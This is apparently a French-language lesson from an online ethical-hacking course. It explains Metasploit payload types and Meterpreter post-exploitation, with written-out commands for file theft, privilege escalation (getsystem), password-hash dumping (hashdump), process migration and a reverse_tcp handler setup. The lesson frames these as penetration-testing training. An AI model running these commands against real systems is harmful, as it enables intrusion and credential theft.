Charges utiles et Meterpreter
Shell post-exploitation
Charges utiles et Meterpreter est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.
Qu’est-ce qu’une charge utile ?
Une charge utile est le code qui s’exécute sur la cible après la réussite d’un exploit. Elle définit ce que vous pouvez faire ensuite, de l’exécution d’une seule commande à l’ouverture d’un interpréteur interactif complet.
Le choix de la charge utile appropriée dépend de l’OS de la cible, de la configuration du réseau et du niveau d’accès dont vous avez besoin.
Avec ou sans étape intermédiaire
Les charges utiles sont distribuées selon deux modes :
- Avec étapes (notez le
/dansmeterpreter/reverse_tcp) : un petit composant initial est envoyé, puis il télécharge la charge utile complète. L’empreinte initiale est plus réduite. - Sans étape (notez le
_dansmeterpreter_reverse_tcp) : la charge utile entière est distribuée en une seule fois. Ce mode est plus fiable sur les réseaux instables.
Interpréteurs liés et inversés
Il existe deux directions de connexion :
- Interpréteur lié : la cible ouvre un port et attend ; vous vous y connectez. Ce type de connexion est souvent bloqué par les pare-feu.
- Interpréteur inversé : la cible se reconnecte à vous (LHOST/LPORT). Cette méthode passe généralement au travers des pare-feu qui autorisent les connexions sortantes.
Les charges utiles inversées sont donc généralement sélectionnées par défaut.
Découvrez Meterpreter
Meterpreter est la charge utile avancée de Metasploit. Contrairement à un simple interpréteur de commandes, il s’exécute en mémoire, communique via un canal chiffré et propose un ensemble riche de commandes pour la post-exploitation.
Comme il évite d’écrire sur le disque, il est plus discret que le dépôt d’un exécutable distinct.
Commandes essentielles de Meterpreter
Une fois que vous disposez d’une session Meterpreter, des commandes fondamentales vous aident à vous repérer sur la cible.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationTransfert de fichiers
Meterpreter transfère des fichiers entre votre machine et la cible à l’aide de commandes simples, ce qui est utile pour récupérer des preuves ou préparer des outils dans le cadre de tests autorisés.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Passage à un interpréteur système
La commande shell vous fait passer de Meterpreter à l’interpréteur de commandes natif de la cible (cmd.exe ou /bin/sh) lorsque vous avez besoin d’exécuter directement des commandes au niveau de l’OS.
Saisissez exit pour revenir à l’invite Meterpreter sans perdre la session.
shell
# C:\> whoami
# exit -> back to meterpreterÉlévation des privilèges
Vous obtenez souvent un accès avec des privilèges limités. Meterpreter vous aide à les élever :
getsystemtente des techniques connues pour obtenir SYSTEM sous Windows.- Le module post-exploitation
local_exploit_suggesterrecommande des exploits d’élévation locale des privilèges pour l’hôte.
Des privilèges plus élevés permettent de récupérer les identifiants et d’approfondir l’accès.
getsystem
run post/multi/recon/local_exploit_suggesterMigration des processus
Votre session s’exécute dans un processus. Si ce processus est instable ou susceptible d’être arrêté, effectuez une migration vers un processus plus stable et de longue durée afin de maintenir votre session active.
La migration vers un processus correspondant à votre niveau de privilèges aide également à vous fondre dans l’environnement et peut modifier votre contexte utilisateur.
ps
migrate 1340 # migrate into a stable PIDMaintien de l’accès
Meterpreter comprend des fonctionnalités permettant de recueillir des données utiles lors d’évaluations autorisées, comme hashdump pour collecter les condensats de mots de passe et les outils de recherche de touches pour montrer l’impact de la capture des entrées.
Utilisez ces fonctionnalités uniquement dans le périmètre convenu et consignez tout dans le rapport destiné au client.
hashdump
run post/windows/gather/checkvmGestionnaires de connexion
Une charge utile inversée a besoin d’un service à l’écoute de votre côté pour intercepter la connexion. Le module multi/handler joue ce rôle. Configurez-le avec la même charge utile, LHOST et LPORT que ceux utilisés pour générer la charge utile.
C’est indispensable lorsque vous distribuez une charge utile msfvenom en dehors de la console : démarrez d’abord le gestionnaire, puis déclenchez la charge utile sur la cible.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jVérification rapide
Choisissez la charge utile qui contourne un pare-feu restrictif.
Récapitulatif
Vous avez découvert les charges utiles et Meterpreter :
- Les charges utiles peuvent être avec étapes (/) ou sans étape (_), et liées ou inversées : les charges inversées franchissent généralement les pare-feu.
- Meterpreter s’exécute en mémoire via un canal chiffré et propose de nombreuses commandes.
- Tâches essentielles : sysinfo, getuid, ps, download/upload, shell.
- Élevez les privilèges avec getsystem et local_exploit_suggester ; utilisez migrate pour stabiliser la session.
- Utilisez les fonctionnalités de collecte uniquement dans le périmètre autorisé et consignez tout.
Ensuite : les modules de post-exploitation, le rebond et la collecte de données.
Questions Fréquemment Posées
La leçon « Charges utiles et Meterpreter » est-elle gratuite ?
Oui — le texte complet de « Charges utiles et Meterpreter » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Charges utiles et Meterpreter » ?
Shell post-exploitation Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?
Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Charges utiles et Meterpreter » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?
Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Architecture de Metasploit
- Rechercher et utiliser des exploits
- Charges utiles et Meterpreter
- Modules post-exploitation